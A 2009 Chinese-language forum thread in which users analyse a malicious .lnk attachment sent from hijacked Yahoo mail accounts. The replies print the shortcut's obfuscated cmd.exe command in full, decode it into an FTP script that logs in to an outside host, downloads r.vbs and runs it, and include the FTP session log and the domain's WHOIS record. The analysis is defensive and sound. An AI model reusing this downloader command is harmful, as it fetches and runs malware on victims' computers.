Yahoo 信箱寄過來的病毒檔，是何種病毒?

**~GG~** · 2009-10-15, 12:52 PM

每隔一段時間，就會收到不同朋友使用 Yahoo 信箱寄過來的病毒檔，將該病毒檔上傳到 VirusTotal 又檢查不出病毒...

請問透過 Yahoo 信箱所寄的病毒，是 User 使用中毒電腦登入 Yahoo 信箱，病毒才透過Yahoo 信箱寄信給通信錄名單嗎?

還是 Yahoo 信箱帳密被盜，被人假用名義寄信..

我將該病毒檔上傳到 VirusTotal 網站又檢測不出問題，真是怪異!

病毒信，信件內容如下:
########################################
給你看我在網路上的第11個老婆的相片

10.15:9

___________________________________________________
您的生活即時通－溝通、娛樂、生活、工作一次搞定！
http://messenger.yahoo.com.tw/
##############################################

所夾帶的附檔以上傳

**tvirus** · 2009-10-15, 05:31 PM

Yahoo帳號被盜用,才從Yahoo寄信出來
(不管是透過標準SMTP還是Yahoo Webmail)
那個是"一連串動作的捷徑"
並不是木馬本體
掃不出來,很正常

**天氣預報** · 2009-10-15, 05:37 PM

NIS 2010全殺
另外VT當然掃不出毒
因為他是做個捷徑到正常檔案

**FYI** · 2009-10-15, 06:19 PM

"3.5 KB" 頂多只是惡意網站連結

**tvirus** · 2009-10-15, 07:07 PM

作者：FYI

"3.5 KB" 頂多只是惡意網站連結

FYI兄有興趣可以玩玩這東西
你就把它當.BAT檔來看就行了
.BAT檔如果有2K,能做的事情就多到跟山一樣了...

**FYI** · 2009-10-15, 07:33 PM

作者：tvirus

FYI兄有興趣可以玩玩這東西
你就把它當.BAT檔來看就行了
.BAT檔如果有2K,能做的事情就多到跟山一樣了...

.BAT 沒這麼容易從郵件裡執行吧! 就小弟的研判, 首先郵件是HTML 格式, 然後夾帶一個附件, 以HTML 語法執行一個附加檔案, 這點不太可能, 因為檔案必須先儲存, 若在HTML 內容直接執行指令, 這點小弟就外行了

用猜的還不如直接打開來看, 果然是兩個 "小么.lnk"

**tvirus** · 2009-10-15, 07:49 PM

作者：FYI

.BAT 沒這麼容易從郵件裡執行吧! 就小弟的研判, 首先郵件是HTML 格式, 然後夾帶一個附件, 以HTML 語法執行一個附加檔案, 這點不太可能, 因為檔案必須先儲存, 若在HTML 內容直接執行指令, 這點小弟就外行了

用猜的還不如直接打開來看, 果然是兩個 "小么.lnk"

是沒那麼容易執行啊
因為都要使用者自己笨笨的點下去啊

既然都點下去了,當然就愛怎麼搞就怎麼搞

我不知道在大多數人的環境下,看不看得到那個副檔名??
(沒在用Outlook express,也很少用Webmail...)

PS:其實應該要問,他們到底在不在意中木馬?

**~GG~** · 2009-10-15, 10:01 PM

請問那個 *.lnk 病毒的內容的目標欄位應該是指令，這些指令為何好像都被編碼?
請問如何將他還原為一般的指令?

%coMsPeC% /C set M=p -s:j&SeT N=.&sET y=G03&sET v=33&SeT e=echO &EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B&EChO %E%AA%v%^>^>j>>B&ecHO %E%bb%v%^>^>j>>B&echo %e%rECV r r.Vbs^>^>J>>B&ECho %E%bY^>^>J>>b&ECho Ft%M%>>b&EchO STaRT r.VBs>>b&reN b u.BAT&CaLl U.Bat&

**FYI** · 2009-10-16, 01:22 AM

作者：~GG~

請問那個 *.lnk 病毒的內容的目標欄位應該是指令，這些指令為何好像都被編碼?
請問如何將他還原為一般的指令?

%coMsPeC% /C set M=p -s:j&SeT N=.&sET y=G03&sET v=33&SeT e=echO &EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B&EChO %E%AA%v%^>^>j>>B&ecHO %E%bb%v%^>^>j>>B&echo %e%rECV r r.Vbs^>^>J>>B&ECho %E%bY^>^>J>>b&ECho Ft%M%>>b&EchO STaRT r.VBs>>b&reN b u.BAT&CaLl U.Bat&

抱歉! 小弟直到現在才明白tvirus 兄的意思, %COMSPEC%, START r.VBS, Call U.BAT, 原來.lnk 只是障眼法, 針對的還是Windows 的漏洞, 可否請樓主貼出完整信件的原始內容?

**tvirus** · 2009-10-16, 02:09 AM

作者：FYI

抱歉! 小弟直到現在才明白tvirus 兄的意思, %COMSPEC%, START r.VBS, Call U.BAT, 原來.lnk 只是障眼法, 針對的還是Windows 的漏洞, 可否請樓主貼出完整信件的原始內容?

透過Prcview去看看這LNK做了啥事...
1.
"C:\WINDOWS\system32\cmd.exe" /C set M=p -s:j&SeT N=.&sET y=G03&sET v=33&SeT e=echO &EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B&EChO %E%AA%v%^>^>j>>B&ecHO %E%bb%v%^>^>j>>B&echo %e%rECV r r.Vbs^>^>J>>B&ECho %E%bY^>^>J>>b&ECho Ft%M%>>b&EchO STaRT r.VBs>>b&reN b u.BAT&CaLl U.Bat&
2.
Ftp -s:j

先將1的部份以&來斷行
"C:\WINDOWS\system32\cmd.exe" /C set M=p -s:j
SeT N=.
sET y=G03
sET v=33
SeT e=echO
EcHo %e%o WWw%n%%y%Z%N%CoM^>J>B
EChO %E%AA%v%^>^>j>>B
ecHO %E%bb%v%^>^>j>>B
echo %e%rECV r r.Vbs^>^>J>>B
ECho %E%bY^>^>J>>b
ECho Ft%M%>>b
EchO STaRT r.VBs>>b
reN b u.BAT
CaLl U.Bat&

因為開始目錄為%windir%
所以在C:\WINDOWS產生了u.bat及J
C:\WINDOWS>type u.bat
%e%o WWw%n%%y%Z%N%CoM>J
%E%AA%v%>>j
%E%bb%v%>>j
%e%rECV r r.Vbs>>J
%E%bY>>J
Ft%M%
STaRT r.VBs

C:\WINDOWS>type j
o www . g03z . com
AA33
bb33
rECV r r.Vbs
bY

所以...目地是用ftp指令,代入script檔案J連到www . g03z . com
帳號密碼輸入後,抓r.vbs回來,然後下指令by斷線
過程:
C:\WINDOWS>ftp www . g03z . com
Connected to www . g03z . com.
220 Serv-U FTP Server v6.4 for WinSock ready...
User (www . g03z . com

none)): AA33
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> rECV r r.Vbs
200 PORT Command successful.
150 Opening ASCII mode data connection for r (1327 Bytes).
226-Maximum disk quota limited to 102400 kBytes
Used disk quota 0 kBytes, available 102400 kBytes
226 Transfer complete.
ftp: 1327 bytes received in 0.01Seconds 88.47Kbytes/sec.
ftp> by
221 Goodbye!
====================================================
然後u.bat最後再start r.vbs

至於那個r.vbs內容是啥...呃...交給你們了...

睡覺前最後PS:
那個g03z,好像是有名的放毒站...
最糟糕的是
主機它在台灣 :Q
http://www.db.ripe.net/whois?form_ty...bject_type=All

Domain Name : g03z.com
PunnyCode : g03z.com
Creation Date : 2009-01-08 16:50:39
Updated Date : 2009-01-08 16:50:39
Expiration Date : 2010-01-08 16:50:21

Registrant:
Organization : ggg zzz
Name : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234

Administrative Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86--02586883333
Fax : 86--02586883333
Email : [email protected]

Technical Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86--02586883333
Fax : 86--02586883333
Email : [email protected]

Billing Contact:
Name : ggg zzz
Organization : zzzzggg
Address : wefwefw wefwefwef
City : 34234234
Province/State : jiangsu
Country : CN
Postal Code : 234234
Phone Number : 86--02586883333
Fax : 86--02586883333
Email : [email protected]

Registry Status: ok